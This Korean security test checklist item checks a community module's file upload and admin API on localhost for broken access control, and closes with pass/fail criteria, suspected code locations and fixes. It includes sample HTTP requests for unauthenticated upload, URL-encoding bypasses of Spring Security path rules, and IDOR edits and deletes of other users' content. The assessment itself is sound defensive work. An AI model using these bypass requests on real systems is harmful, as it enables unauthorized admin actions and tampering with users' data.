================================================================================
[VCE-CM-17] 접근 제어 우회 가능성 확인 (커뮤니티)
도메인: community
================================================================================

1. 진단 항목 개요
   - 항목명: 커뮤니티 파일 업로드 및 관리자 API 접근 제어 우회
   - 번호: CM-17
   - 위험도: High
   - OWASP: A01:2021 – Broken Access Control

2. 대상 기능 & 엔드포인트
   - 로컬:  http://localhost:8080/api/community/uploads
   - 로컬:  http://localhost:8080/api/community/admin/**
   - HTTP 메서드: POST, PATCH, DELETE
   - 인증 요건: 확인 필요

3. 취약점 원리 (Why this works)
   1. POST /api/community/uploads 엔드포인트에 @AuthenticationPrincipal이 없을 경우
      비인증 사용자도 파일 업로드 가능
   2. /api/community/admin/** 경로가 SecurityConfig에서 보호되지 않아
      일반 사용자가 접근 가능
   3. URL 인코딩/대소문자 변환으로 Spring Security 필터 우회 가능

4. 테스트 절차 (Step-by-step)

   Step 1. 비인증 파일 업로드 시도
   --- HTTP 요청 예시 ---
   POST /api/community/uploads HTTP/1.1
   Host: localhost:8080
   Content-Type: multipart/form-data; boundary=----Boundary
   (Authorization 헤더 없음)

   ------Boundary
   Content-Disposition: form-data; name="file"; filename="test.jpg"
   Content-Type: image/jpeg

   JFIF...
   ------Boundary--
   ---

   Step 2. 일반 사용자로 커뮤니티 관리자 API 접근
   --- HTTP 요청 예시 ---
   PATCH /api/community/admin/members/1/status HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer <USER_JWT>
   Content-Type: application/json

   {"status": "BANNED"}
   ---

   Step 3. URL 인코딩 우회
   --- HTTP 요청 예시 ---
   PATCH /api/community/%61dmin/members/1/status HTTP/1.1
   PATCH /api/community/admin%2fmembers/1/status HTTP/1.1
   ---

   Step 4. 타 사용자 게시글 수정 (IDOR)
   --- HTTP 요청 예시 ---
   PUT /api/community/posts/999 HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer <JWT_A>
   Content-Type: application/json

   {"title": "수정됨", "content": "공격자 내용"}
   ---
   (999번 게시글이 JWT_A 소유가 아닌 경우)

   Step 5. 타 사용자 댓글 삭제 (IDOR)
   --- HTTP 요청 예시 ---
   DELETE /api/community/comments/999 HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer <JWT_A>
   ---

5. 취약 여부 판단 기준
   ✅ 취약 (Vulnerable):
      - 비인증 파일 업로드 HTTP 200
      - 일반 사용자 JWT로 관리자 API HTTP 200
      - 타 사용자 게시글/댓글 수정/삭제 성공
   ✗ 안전 (Not Vulnerable):
      - 비인증 업로드 → HTTP 401
      - 일반 사용자 관리자 API → HTTP 403
      - 타 사용자 자원 수정 → HTTP 403

6. 예상 취약 포인트 (코드 위치)
   - CommunityController.java — /api/community/uploads @AuthenticationPrincipal 누락 가능
   - CommunityController.java:104-111 — admin 엔드포인트 권한 검증 없음
   - CommunityService.java — 게시글/댓글 소유자 검증 로직

7. 권고 조치
   - /api/community/uploads 인증 필수 적용
   - /api/community/admin/** → SecurityConfig에서 hasRole("ADMIN") 추가
   - 게시글/댓글 수정/삭제 시 소유자 확인 후 처리
